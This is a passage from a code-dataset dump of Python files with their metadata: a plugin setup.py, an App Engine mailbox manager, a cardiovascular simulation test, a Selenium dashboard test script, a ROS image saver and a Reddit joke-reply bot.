"python-toolbox/setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 3259, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.join", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 74, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 107, "usage_type": "call"}, {"api_name": "os.path", "line_number": 107, "usage_type": "attribute"}, {"api_name": "setuptools.find_packages", "line_number": 111, "usage_type": "call"}]} +{"seq_id": "576786641", "text": "from setuptools import setup\n\n__VERSION__ = \"0.3.1\"\n\n\nsetup(\n name=\"joseph_hello_world\",\n description=\"A hello world plugin for Joseph. Write an hello world message to the logs.\",\n author=\"Niek Keijzer\",\n author_email=\"info@niekkeijzer.com\",\n url=\"https://github.com/NiekKeijzer/HelloWorld\",\n download_url=\"https://github.com/NiekKeijzer/HelloWorld/archive/{}.tar.gaz\".format(__VERSION__),\n keywords=[\n \"hello world\",\n \"joseph\"\n ],\n packages=[\n \"hello_world\"\n ],\n version=__VERSION__,\n entry_points={\n 'joseph.actions': [\n 'say_hello = hello_world.hello:say_hello'\n ]\n }\n)", "sub_path": "pypi_install_script/joseph_hello_world-0.3.1.tar/setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 657, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "setuptools.setup", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "585961978", "text": "\n# -*- coding: utf-8 -*-\n\nfrom base.mailbox import MailboxManager\nfrom models.sender_account import SenderAccountDao\n\n\nclass SenderAccountManager(MailboxManager):\n\n \"\"\"\n Lógica de negocio correspondiente a la entidad SenderAccountDao.\n \"\"\"\n\n def __init__(self, user=None, sender_account_id=None):\n\n \"\"\"\n Constructor de la clase.\n :param user: Usuario actual.\n :param sender_account_id: Identificador del buzón emisor.\n \"\"\"\n\n super(SenderAccountManager, self).__init__(user)\n if sender_account_id:\n self._sender_account_id = int(sender_account_id)\n\n def create(self, sender_account):\n\n \"\"\"\n Crea un buzón emisor.\n :param sender_account: Diccionario que representa un buzón emisor.\n :return: El buzón emisor creado.\n \"\"\"\n\n from oauth2client.contrib.appengine import CredentialsModel\n\n # Comprobamos que los campos obligatorios están incluidos.\n if \"email\" not in sender_account or not sender_account[\"email\"]:\n raise Exception(\"The account must have an email.\")\n\n # Volcamos el contenido de sender_account y actualizamos usuario creador.\n entity = SenderAccountDao(**sender_account)\n entity.created_by = self._user\n entity.updated_by = self._user\n # Comprobamos si el buzón ya ha autorizado el acceso de la aplicación.\n # En ese caso, lo establecemos como autorizado.\n entity.is_authorized = CredentialsModel.get_by_key_name(entity.email) is not None\n entity.put()\n return entity\n\n def get(self):\n\n \"\"\"\n Obtiene un buzón emisor.\n :return: El buzón emisor obtenido.\n \"\"\"\n\n from google.appengine.ext.ndb import Key\n\n entity = Key(SenderAccountDao, self._sender_account_id).get()\n # Comprobamos si el buzón existe.\n if entity is None:\n raise Exception(\"The given entity does not exist.\")\n return entity\n\n @classmethod\n def list(cls):\n\n \"\"\"\n Obtiene la colección de buzones emisores.\n :return: La colección de buzones obtenida.\n \"\"\"\n\n from google.appengine.api import memcache\n\n memcache_key = SenderAccountDao.COLLECTION_MEMCACHE_KEY\n entities = memcache.get(memcache_key)\n\n if entities is None:\n entities = [k.to_dict() for k in SenderAccountDao.query().iter()]\n memcache.add(memcache_key, entities, 0)\n return entities\n\n def update(self, sender_account):\n\n \"\"\"\n Actualiza el buzón emisor indicado.\n :param sender_account: Diccionario que representa el buzón emisor.\n :return: El buzón emisor actualizado.\n \"\"\"\n\n entity = self.get()\n # Comprobamos que campos hay que actualizar.\n if \"email\" in sender_account and sender_account[\"email\"]:\n entity.email = sender_account[\"email\"]\n if \"group\" in sender_account and sender_account[\"group\"]:\n entity.group = sender_account[\"group\"]\n if \"is_active\" in sender_account and isinstance(sender_account[\"is_active\"], bool):\n entity.is_active = sender_account[\"is_active\"]\n entity.updated_by = self._user\n entity.put()\n return entity\n\n def add_group(self, group_id):\n\n \"\"\"\n Agrega el buzón emisor a un nuevo grupo.\n :param group_id: Identificador del grupo.\n :return: La cuenta actualizada.\n \"\"\"\n\n from models.master import MasterDao\n from managers.group import GroupManager\n\n entity = self.get()\n group_id = int(group_id)\n # Comprobamos que el buzón emisor no pertenezca actualmente al grupo dado.\n if filter(lambda x: x.id == group_id, entity.groups):\n raise Exception(\"This account is already in this group.\")\n # En caso contrario, lo actualizamos.\n group_entity = GroupManager(group_id=group_id).get()\n master = MasterDao()\n master.id = group_entity.key.id()\n master.name = group_entity.name\n entity.groups.append(master)\n entity.updated_by = self._user\n entity.put()\n return entity\n\n def delete(self):\n\n \"\"\"\n Elimina el buzón emisor dado.\n \"\"\"\n\n from google.appengine.ext.ndb import Key\n\n Key(SenderAccountDao, self._sender_account_id).delete()\n\n def delete_group(self, group_id):\n\n \"\"\"\n Elimina un grupo de la lista de grupos del buzón emisor.\n :param group_id: Identificador del grupo.\n :return: La cuenta actualizada.\n \"\"\"\n\n entity = self.get()\n found = False\n group_id = int(group_id)\n for i in range(len(entity.groups)):\n if entity.groups[i].id == group_id:\n entity.groups.pop(i)\n found = True\n break\n # Comprobamos que el buzón emisor pertenezca al grupo dado.\n if not found:\n raise Exception(\"This account is not in this group.\")\n entity.put()\n return entity\n\n def available_groups(self):\n\n \"\"\"\n Obtiene la colección de grupos a los cuales pertenece el buzón emisor.\n :return: La colección obtenida.\n \"\"\"\n\n from managers.group import GroupManager\n\n entity = self.get()\n taken_groups = set([k.id for k in entity.groups])\n entity_groups = GroupManager().list()\n all_groups = set([k[\"id\"] for k in entity_groups])\n # [k for k in entity_groups if k[\"id\"] in list(all_groups.difference(taken_groups))]\n return filter(lambda x: x[\"id\"] in list(all_groups.difference(taken_groups)), entity_groups)\n\n @staticmethod\n def get_by_email(email):\n\n \"\"\"\n Obtiene un buzón receptor.\n :return: El buzón receptor obtenido.\n \"\"\"\n\n entity = SenderAccountDao.query(SenderAccountDao.email == email).fetch(1)\n # Comprobamos que el buzón existe actualmente.\n if entity is None:\n raise Exception(\"The given entity does not exist.\")\n return entity\n\n def authorize(self, email):\n\n \"\"\"\n Establece el buzón receptor dado como autorizado, crea las etiquetas DUPLICADO,\n GESTIONADO, PDTE REINTENTAR y ERROR en el buzón dado.\n :param email: Identificador del buzón.\n :return: El buzón autorizado.\n \"\"\"\n\n from pending_authorization import PendingAuthorizationManager\n from core.logger import Logger\n\n try:\n entity = self.get_by_email(email)\n if entity is not None:\n # Marcamos el buzón como autorizado.\n entity.is_authorized = True\n # Añadimos la información de tracking.\n entity.updated_by = self._user\n entity.put()\n # Obtenemos el diccionario que representa el buzón actualizado.\n entity = entity.to_dict()\n # Eliminamos la autorización.\n PendingAuthorizationManager.delete(entity[\"user_id\"])\n except Exception as e:\n Logger.error(e)\n raise e\n return entity\n", "sub_path": "managers/sender_account.py", "file_name": "sender_account.py", "file_ext": "py", "file_size_in_byte": 7174, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "base.mailbox.MailboxManager", "line_number": 8, "usage_type": "name"}, {"api_name": "models.sender_account.SenderAccountDao", "line_number": 41, "usage_type": "call"}, {"api_name": "oauth2client.contrib.appengine.CredentialsModel.get_by_key_name", "line_number": 46, "usage_type": "call"}, {"api_name": "oauth2client.contrib.appengine.CredentialsModel", "line_number": 46, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 59, "usage_type": "call"}, {"api_name": "models.sender_account.SenderAccountDao", "line_number": 59, "usage_type": "argument"}, {"api_name": "models.sender_account.SenderAccountDao.COLLECTION_MEMCACHE_KEY", "line_number": 75, "usage_type": "attribute"}, {"api_name": "models.sender_account.SenderAccountDao", "line_number": 75, "usage_type": "name"}, {"api_name": "google.appengine.api.memcache.get", "line_number": 76, "usage_type": "call"}, {"api_name": "google.appengine.api.memcache", "line_number": 76, "usage_type": "name"}, {"api_name": "models.sender_account.SenderAccountDao.query", "line_number": 79, "usage_type": "call"}, {"api_name": "models.sender_account.SenderAccountDao", "line_number": 79, "usage_type": "name"}, {"api_name": "google.appengine.api.memcache.add", "line_number": 80, "usage_type": "call"}, {"api_name": "google.appengine.api.memcache", "line_number": 80, "usage_type": "name"}, {"api_name": "managers.group.GroupManager", "line_number": 120, "usage_type": "call"}, {"api_name": "models.master.MasterDao", "line_number": 121, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb.Key", "line_number": 137, "usage_type": "call"}, {"api_name": "models.sender_account.SenderAccountDao", "line_number": 137, "usage_type": "argument"}, {"api_name": "managers.group.GroupManager", "line_number": 172, "usage_type": "call"}, {"api_name": "models.sender_account.SenderAccountDao.query", "line_number": 185, "usage_type": "call"}, {"api_name": "models.sender_account.SenderAccountDao", "line_number": 185, "usage_type": "name"}, {"api_name": "models.sender_account.SenderAccountDao.email", "line_number": 185, "usage_type": "attribute"}, {"api_name": "pending_authorization.PendingAuthorizationManager.delete", "line_number": 214, "usage_type": "call"}, {"api_name": "pending_authorization.PendingAuthorizationManager", "line_number": 214, "usage_type": "name"}, {"api_name": "core.logger.Logger.error", "line_number": 216, "usage_type": "call"}, {"api_name": "core.logger.Logger", "line_number": 216, "usage_type": "name"}]} +{"seq_id": "617345222", "text": "#!/usr/bin/env python3\n\nimport ambit\n\nimport sys, traceback\nimport numpy as np\nfrom pathlib import Path\n\nimport results_check\n\n\ndef main():\n\n basepath = str(Path(__file__).parent.absolute())\n\n IO_PARAMS = {'problem_type' : 'flow0d', # solid, fluid, flow0d, solid_flow0d, fluid_flow0d\n 'write_results_every' : -999,\n 'output_path' : ''+basepath+'/tmp',\n 'simname' : 'test'}\n\n SOLVER_PARAMS = {'tol_res' : 1.0e-8,\n 'tol_inc' : 1.0e-8}\n\n TIME_PARAMS = {'maxtime' : 10*1.0,\n 'numstep' : 10*100,\n 'timint' : 'ost', # ost\n 'theta_ost' : 0.5,\n 'initial_conditions' : init(),\n 'eps_periodic' : 0.03,\n 'periodic_checktype' : 'pQvar'}\n \n MODEL_PARAMS = {'modeltype' : 'syspul',\n 'parameters' : param(),\n 'chamber_models' : {'lv' : {'type' : '0D_elast', 'activation_curve' : 2}, 'rv' : {'type' : '0D_elast', 'activation_curve' : 2}, 'la' : {'type' : '0D_elast', 'activation_curve' : 1}, 'ra' : {'type' : '0D_elast', 'activation_curve' : 1}}}\n \n\n # define your time curves here (syntax: tcX refers to curve X)\n class time_curves():\n \n def tc1(self, t): # atrial activation\n \n act_dur = 2.*param()['t_ed']\n t0 = 0.\n \n if t >= t0 and t <= t0 + act_dur:\n return 0.5*(1.-np.cos(2.*np.pi*(t-t0)/act_dur))\n else:\n return 0.0\n\n def tc2(self, t): # ventricular activation\n \n act_dur = 1.8*(param()['t_es'] - param()['t_ed'])\n t0 = param()['t_ed']\n \n if t >= t0 and t <= t0 + act_dur:\n return 0.5*(1.-np.cos(2.*np.pi*(t-t0)/act_dur))\n else:\n return 0.0\n\n\n # problem setup\n problem = ambit.Ambit(IO_PARAMS, TIME_PARAMS, SOLVER_PARAMS, constitutive_params=MODEL_PARAMS, time_curves=time_curves())\n \n # solve time-dependent problem\n problem.solve_problem()\n\n\n # --- results check\n tol = 1.0e-6\n\n s_corr = np.zeros(problem.mp.cardvasc0D.numdof)\n\n # correct results\n s_corr[0] = 2.7156831671111686E+04\n s_corr[1] = 6.5014832315152615E-01\n s_corr[2] = 2.3863884814303105E-01\n s_corr[3] = 6.2299149148041377E-01\n s_corr[4] = 7.3204325568836603E+00\n s_corr[5] = 4.4855244723865435E+04\n s_corr[6] = 1.9666233818994407E+00\n s_corr[7] = -2.3737219188883661E+04\n s_corr[8] = 3.2279121521802968E+04\n s_corr[9] = 4.9648390872022957E-01\n s_corr[10] = 1.6997499381247427E-01\n s_corr[11] = 4.6420478719842723E-01\n s_corr[12] = 1.8990559860434069E+00\n s_corr[13] = -8.1705347914691476E+04\n s_corr[14] = 1.4965782216339247E+00\n s_corr[15] = -1.0232540549572852E+04\n \n check1 = results_check.results_check_vec(problem.mp.s, s_corr, problem.mp.comm, tol=tol)\n success = results_check.success_check([check1], problem.mp.comm)\n \n return success\n\n\ndef init():\n \n return {'q_vin_l_0' : 0.0,\n 'p_at_l_0' : 0.599950804034,\n 'q_vout_l_0' : 0.0,\n 'p_v_l_0' : 0.599950804034,\n 'p_ar_sys_0' : 9.68378038166,\n 'q_ar_sys_0' : 0.0,\n 'p_ven_sys_0' : 2.13315841434,\n 'q_ven_sys_0' : 0.0,\n 'q_vin_r_0' : 0.0,\n 'p_at_r_0' : 0.0933256806275,\n 'q_vout_r_0' : 0.0,\n 'p_v_r_0' : 0.0933256806275,\n 'p_ar_pul_0' : 3.22792679389,\n 'q_ar_pul_0' : 0.0,\n 'p_ven_pul_0' : 1.59986881076,\n 'q_ven_pul_0' : 0.0}\n\n\ndef param():\n \n # parameters in kg-mm-s unit system\n \n R_ar_sys = 120.0e-6\n tau_ar_sys = 1.0311433159\n tau_ar_pul = 0.3\n \n # Diss Hirschvogel tab. 2.7\n C_ar_sys = tau_ar_sys/R_ar_sys\n Z_ar_sys = R_ar_sys/20.\n R_ven_sys = R_ar_sys/5.\n C_ven_sys = 30.*C_ar_sys\n R_ar_pul = R_ar_sys/8.\n C_ar_pul = tau_ar_pul/R_ar_pul\n Z_ar_pul = 0.\n R_ven_pul = R_ar_pul\n C_ven_pul = 2.5*C_ar_pul\n \n L_ar_sys = 0.667e-6\n L_ven_sys = 0.\n L_ar_pul = 0.\n L_ven_pul = 0.\n \n # timings\n t_ed = 0.2\n t_es = 0.53\n T_cycl = 1.0\n \n # atrial elastances\n E_at_max_l = 2.9e-5\n E_at_min_l = 9.0e-6\n E_at_max_r = 1.8e-5\n E_at_min_r = 8.0e-6\n # ventricular elastances\n E_v_max_l = 30.0e-5\n E_v_min_l = 12.0e-6\n E_v_max_r = 20.0e-5\n E_v_min_r = 10.0e-6\n \n \n return {'R_ar_sys' : R_ar_sys,\n 'C_ar_sys' : C_ar_sys,\n 'L_ar_sys' : L_ar_sys,\n 'Z_ar_sys' : Z_ar_sys,\n 'R_ar_pul' : R_ar_pul,\n 'C_ar_pul' : C_ar_pul,\n 'L_ar_pul' : L_ar_pul,\n 'Z_ar_pul' : Z_ar_pul,\n 'R_ven_sys' : R_ven_sys,\n 'C_ven_sys' : C_ven_sys,\n 'L_ven_sys' : L_ven_sys,\n 'R_ven_pul' : R_ven_pul,\n 'C_ven_pul' : C_ven_pul,\n 'L_ven_pul' : L_ven_pul,\n # atrial elastances\n 'E_at_max_l' : E_at_max_l,\n 'E_at_min_l' : E_at_min_l,\n 'E_at_max_r' : E_at_max_r,\n 'E_at_min_r' : E_at_min_r,\n # ventricular elastances\n 'E_v_max_l' : E_v_max_l,\n 'E_v_min_l' : E_v_min_l,\n 'E_v_max_r' : E_v_max_r,\n 'E_v_min_r' : E_v_min_r,\n # valve resistances\n 'R_vin_l_min' : 1.0e-6,\n 'R_vin_l_max' : 1.0e1,\n 'R_vout_l_min' : 1.0e-6,\n 'R_vout_l_max' : 1.0e1,\n 'R_vin_r_min' : 1.0e-6,\n 'R_vin_r_max' : 1.0e1,\n 'R_vout_r_min' : 1.0e-6,\n 'R_vout_r_max' : 1.0e1,\n # timings\n 't_ed' : t_ed,\n 't_es' : t_es,\n 'T_cycl' : T_cycl,\n # unstressed compartment volumes (for post-processing)\n 'V_at_l_u' : 0.0,\n 'V_at_r_u' : 0.0,\n 'V_v_l_u' : 0.0,\n 'V_v_r_u' : 0.0,\n 'V_ar_sys_u' : 0.0,\n 'V_ar_pul_u' : 0.0,\n 'V_ven_sys_u' : 0.0,\n 'V_ven_pul_u' : 0.0}\n\n\n\n\nif __name__ == \"__main__\":\n \n success = False\n \n try:\n success = main()\n except:\n print(traceback.format_exc())\n \n if success:\n sys.exit(0)\n else:\n sys.exit(1)\n", "sub_path": "testing/flow0d_0Dheart_syspul.py", "file_name": "flow0d_0Dheart_syspul.py", "file_ext": "py", "file_size_in_byte": 6590, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pathlib.Path", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 46, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 56, "usage_type": "attribute"}, {"api_name": "ambit.Ambit", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 71, "usage_type": "call"}, {"api_name": "results_check.results_check_vec", "line_number": 91, "usage_type": "call"}, {"api_name": "results_check.success_check", "line_number": 92, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 215, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 218, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 220, "usage_type": "call"}]} +{"seq_id": "221986894", "text": "# -*- coding: utf-8 -*-\nfrom bs4 import BeautifulSoup\nimport requests\nimport json\nimport copy\nimport pandas as pd\nfrom pandas import DataFrame as df\nimport time\nimport os\nimport sys\nsys.path.append('..')\nimport config as conf\n\nfrom selenium import webdriver # 從library中引入webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.support.ui import Select\n\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions\n\n\nclass Federatorai_Selenium():\n\n def __init__(self, browser):\n self.wait = WebDriverWait(browser, 60, 0.5)\n self.browser = browser\n pass\n\n def login(self, ip, account, password):\n self.browser.get(\"https://federatorai-dashboard-frontend-federatorai.apps.%s.nip.io\" %ip)\n\n self.browser.find_element_by_xpath(\"//input[@tabindex='1']\").send_keys(account) # enter account\n time.sleep(2)\n\n self.browser.find_element_by_xpath(\"//input[@tabindex='2']\").send_keys(password) # enter password\n time.sleep(2)\n\n self.browser.find_element_by_xpath(\"//button[@class='el-button el-button--primary el-button--medium']\").click() # login\n time.sleep(5)\n\n def cost_multicloud_cost_analysis(self):\n self.browser.find_element_by_xpath(\"//div[@class='el-scrollbar__view']/ul[1]/div[6]\").click() # Cost\n time.sleep(1)\n\n self.browser.find_element_by_xpath(\"//div[@class='el-scrollbar__view']/ul[1]/div[6]/li[1]/ul[1]/div[1]\").click() # Multicloud Cost Analysis\n time.sleep(2)\n\n # region check\n self.browser.find_element_by_xpath(\"//form[@class='el-form el-form--label-left el-form--inline']/div[2]/div[1]\").click()\n time.sleep(2)\n self.wait.until(EC.presence_of_element_located((By.XPATH, \"//div[@class='el-select-dropdown el-popper select-popper']/div[1]/div[1]/ul[1]/li[1]\")))\n time.sleep(5)\n\n # ----success to get region----\n # ----use mouse to click----\n for i in range(3, 30): # fail to get 0:All 1:Australia(These two items will jump to other page)\n try:\n element = self.browser.find_element_by_xpath(\"//div[@class='el-select-dropdown el-popper select-popper']/div[1]/div[1]/ul[1]/li[%s]\" % i)\n ActionChains(self.browser).move_to_element(element).perform()\n ActionChains(self.browser).click(element).perform()\n print(element.text)\n self.browser.find_element_by_xpath(\"//form[@class='el-form el-form--label-left el-form--inline']/div[2]/div[1]\").click()\n time.sleep(2)\n except:\n pass\n\n # ----fail to get region----\n #all_region = browser.find_element_by_xpath(\"//div[@class='el-select-dropdown el-popper select-popper']/div[1]/div[1]/ul[1]\")\n #print(all_region.text)\n\n\n # check current price and region\n current_info = self.browser.find_element_by_xpath(\"//div[@class='el-row']/section[1]/main[1]/div[1]/div[1]\")\n # print(current_info.text)\n current_info_list = str(current_info.text).splitlines()\n print(current_info_list)\n price = current_info_list[-4]\n region = current_info_list[-1]\n print(price, region)\n time.sleep(5)\n\n def cost_cost_allocation(self):\n self.browser.find_element_by_xpath(\"//div[@class='el-scrollbar__view']/ul[1]/div[6]\").click() # Cost\n time.sleep(1)\n\n self.browser.find_element_by_xpath(\"//div[@class='el-scrollbar__view']/ul[1]/div[6]/li[1]/ul[1]/div[2]\").click() # Cost Allocation\n time.sleep(5)\n\n def about(self):\n self.browser.find_element_by_xpath(\"//div[@class='avatar-container right-menu-item hover-effect el-dropdown']\").click() # About\n time.sleep(2)\n\n self.browser.find_element_by_xpath(\"//ul[@class='el-dropdown-menu el-popper el-dropdown-menu--medium']/li[2]\").click()\n time.sleep(2)\n\n about_info = self.browser.find_element_by_xpath(\"//div[@class='el-dialog__body']\")\n print(about_info.text)\n\n def dashbard(self):\n\n node_number = self.browser.find_element_by_xpath(\"//main[@class='el-main']/div[1]/div[1]/div[1]/p[1]\")\n print(node_number.text)\n\n node_info = self.browser.find_element_by_xpath(\"//main[@class='el-main']/div[2]/div[1]/div[2]/div[3]\")\n #print(node_info.text)\n node_info_list = str(node_info.text).splitlines()\n #print(node_info_list)\n\n application_info = self.browser.find_element_by_xpath(\"//div[@class='container']/div[2]/div[2]/section[1]/main[1]/div[1]/div[1]/div[2]/div[3]\")\n #print(application_info.text)\n application_info_list = str(application_info.text).splitlines()\n print(application_info_list)\n\n # test search function\n search_sting = input(\"search string:\")\n self.browser.find_element_by_xpath(\"//main[@class='el-main']/div[2]/div[1]/div[1]/div[1]/input[1]\").send_keys(search_sting)\n node_info = self.browser.find_element_by_xpath(\"//main[@class='el-main']/div[2]/div[1]/div[2]/div[3]\")\n print(node_info.text)\n\n time.sleep(5)\n\nif __name__ == '__main__':\n # create browser\n browser = webdriver.Chrome(\"C:\\\\Users\\\\Brian\\\\Desktop\\\\python_crawl\\\\chromedriver.exe\")\n browser.maximize_window()\n \n # test\n federatorai_gui_operation = Federatorai_Selenium(browser)\n federatorai_gui_operation.login(\"172.31.6.110\", \"admin\", \"admin\")\n #federatorai_gui_operation.cost_multicloud_cost_analysis()\n #federatorai_gui_operation.about()\n federatorai_gui_operation.dashbard()\n\n # close broser\n browser.close()\n", "sub_path": "fedemeter_cost_db_prepare/python_crawl/federatorai_gui_test/pototype.py", "file_name": "pototype.py", "file_ext": "py", "file_size_in_byte": 5788, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sys.path.append", "line_number": 11, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 27, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 35, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 38, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 41, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 45, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 48, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 52, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 53, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 53, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 53, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 53, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 54, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.action_chains.ActionChains", "line_number": 61, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.action_chains.ActionChains", "line_number": 62, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 65, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 82, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 86, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 89, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 93, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 96, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 122, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 126, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 126, "usage_type": "name"}]} +{"seq_id": "22074124", "text": "#!/usr/bin/env python3\n\n# Shebang changed from ``python2`` (2022/3/16)\n# Any reason older Python version was used?\n\nimport time\nimport threading\nimport rospy\nimport numpy\nimport os\nimport sys\n\nsys.path.append(\"/home/amigos/ros/src/necst/lib\")\nsys.path.append(\"/opt/ros/kinetic/lib/python2.7/dist-packages\")\nsys.path.append(\"/home/amigos/Pictures/capture\")\nimport cv2\nfrom cv_bridge import CvBridge\nfrom PIL import Image as i\nfrom sensor_msgs.msg import Image as Imagemsg\nfrom necst.msg import oneshot_msg\n\n\nclass Image(object):\n filename = \"\"\n dirname = \"\"\n shot_mode = \"\"\n\n def __init__(self):\n pass\n\n def Image_save(self, req):\n if os.path.exists(self.dirname + self.filename) == True:\n return\n else:\n print(\"subscribe picture\")\n bridge = CvBridge()\n img_data = bridge.imgmsg_to_cv2(req, \"bgr8\")\n if not os.path.exists(self.dirname):\n os.makedirs(self.dirname)\n cv2.imwrite(self.dirname + self.filename, img_data)\n print(self.dirname, self.filename)\n print(\"save picture\")\n if self.shot_mode == \"oneshot\":\n img = i.open(self.dirname + self.filename)\n img.show()\n elif self.shot_mode == \"all_sky\":\n pass\n self.filename = \"\"\n return\n\n def dif_file(self, req):\n self.filename = req.filename + \".jpg\"\n self.dirname = req.dirname\n return\n\n\nif __name__ == \"__main__\":\n image = Image()\n rospy.init_node(\"Image_saver\")\n sub1 = rospy.Subscriber(\"Image\", Imagemsg, image.Image_save)\n sub2 = rospy.Subscriber(\"oneshot\", oneshot_msg, image.dif_file)\n print(\"waiting picture\")\n rospy.spin()\n", "sub_path": "scripts/device/ROS_image.py", "file_name": "ROS_image.py", "file_ext": "py", "file_size_in_byte": 1750, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sys.path.append", "line_number": 13, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 14, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 15, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "cv_bridge.CvBridge", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 39, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 40, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 44, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 44, "usage_type": "name"}, {"api_name": "rospy.init_node", "line_number": 59, "usage_type": "call"}, {"api_name": "rospy.Subscriber", "line_number": 60, "usage_type": "call"}, {"api_name": "sensor_msgs.msg.Image", "line_number": 60, "usage_type": "argument"}, {"api_name": "rospy.Subscriber", "line_number": 61, "usage_type": "call"}, {"api_name": "necst.msg.oneshot_msg", "line_number": 61, "usage_type": "argument"}, {"api_name": "rospy.spin", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "54521902", "text": "import praw\nimport time\n\n\"\"\"\nDadBot.py\n\nCreates a dad joke in the subreddit for every comment that contains \"I'm\"\n\"\"\"\n\nreddit = praw.Reddit(user_agent=\"DadBot\") # put a better name here\nreddit.login()\n\nwords_to_match = ['i\\'m'] # list goes here\ncache = [] # holds comments already replied to\n\n\ndef run_bot():\n load_cache()\n subreddit = reddit.get_subreddit(\"asdfmattsubreddittest\")\n comments = subreddit.get_comments()\n\n for comment in comments:\n comment_text = comment.body.lower()\n is_match = any(string in comment_text for string in words_to_match)\n\n if comment.id not in cache and is_match:\n text = comment.body.split(\"I'm \", 1)[1]\n\n # reply var to get our comment id so infinite cycle doesn't occur\n reply = comment.reply(\"Hi %s, I'm Dad!\" % text)\n comment.reply(\"Hi %s, I'm Dad!\" % text)\n\n cache.append(comment.id)\n cache.append(reply.id)\n # END if\n # END for\n# END run_bot()\n\n\ndef load_cache():\n with open(\"dadbot_cache.txt\", \"r\") as ins:\n for line in ins:\n if line not in cache:\n cache.append(line)\n # END for\n # END open\n# END load_cache()\n\n\ndef write_cache():\n cache_file = open(\"dadbot_cache.txt\", \"w\")\n for item in cache[:-1]:\n cache_file.write(\"%s\\n\" % item)\n else:\n cache_file.write(\"%s\" % item)\n # END for\n cache_file.close()\n# END write_cache()\n\n\nwhile True:\n try:\n run_bot()\n # not sure if praw has something built in\n time.sleep(10)\n except KeyboardInterrupt:\n print(\"Ending\")\n write_cache()\n SystemExit(0)\n# END while", "sub_path": "src/DadBot.py", "file_name": "DadBot.py", "file_ext": "py", "file_size_in_byte": 1671, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "praw.Reddit", "line_number": 10, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 65, "usage_type": "call"}]} +{"seq_id": "419457843", "text": "import re\r\nimport csv\r\nimport time\r\nfrom datetime import datetime, timedelta,date\r\nfrom pytz import timezone\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nfrom 